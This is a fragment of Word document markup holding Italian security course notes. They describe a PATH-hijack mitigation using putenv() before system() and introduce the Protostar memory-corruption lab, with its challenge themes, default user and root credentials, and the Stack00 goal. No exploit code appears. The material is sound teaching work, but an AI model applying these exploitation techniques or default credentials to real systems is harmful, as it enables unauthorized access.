          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Test: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">getflag is executing on a non-flag account, this doesn't count</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="724"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="724"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigazione 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Impostazione sicura di PATH prima di system() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Si parta dal sorgente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">level1.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> e lo si modifichi in modo da impostare in maniera sicura la variabile di ambiente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PATH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">prima di eseguire </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">system() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Idea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">: la funzione di libreria </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">putenv()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> modifica una variabile di ambiente già impostata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">putenv("PATH=/bin:/sbin:/usr/bin:/usr/sbin")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="712"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="718"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Protostar VM</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rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">La macchina virtuale Protostar contiene esercizi di sicurezza legati alla corruzione della memoria</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Protostar è strutturata come una challenge, suddivisa per temi (in totale, 24 sfide):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack-based buffer overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Format string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Heap-based buffer overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Newtork byte ordering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Giocatori</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">: un utente che intende partecipare alla sfida si autentica con le credenziali univoche </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">user:user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> per tutte le sfide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Amministratore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">: si usa l'utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">(pwd: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">godmode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Dopo l'autenticazione, l'utente user usa le informazioni contenute nella directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/protostar/bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> per conseguire uno specifico obiettivo.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="734"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">"This level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and that modifying outside of the allocated memory can modify program execution."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="719"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">cambiare il valore della variabile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">modified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> a tempo di esecuzione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Prime cose da fare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
